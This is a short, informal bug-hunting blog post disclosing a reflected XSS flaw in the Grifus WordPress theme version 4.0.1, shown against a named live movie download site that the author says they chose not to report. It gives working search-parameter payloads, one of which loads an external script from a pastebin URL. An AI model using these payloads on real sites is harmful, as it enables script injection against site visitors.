Hello
Friend, good afternoon everyone, this time I share a little more bugs that I found on one of the movie download sites which is quite large, GUDANGMOVIES21.
Title: Grifus WordPress Themes XSS Vuln
Affected Version: 4.0.1
Homepage: https://mundothemes.com/grifus/
============
Why don't you just report it ? The point is I'm lazy to report bugs like this, the ending is just underestimated by them, right they say XSS is just a trivial thing hihi, so it's just lazy. Better Just WriteUP and to share experiences.
Here are the payloads that I use:
<script>prompt(document.domain)</script>
For the URL Vulnerability & Parameters you can open / see below:
https://gudangmovies21.today/?s=<script>prompt(document.domain)</script>
Alright, maybe that's all for today, thank you ...
That's all from me, Happy Bug Hunting and thanks for coming here.
Not only that, I also tried to use the html script in XSS this time and it worked. Here is the payload :
https://gudangmovies21.today/?s=<script src=https://pastebin.com/raw/VX2Sig1t/></script>
EmoticonEmoticon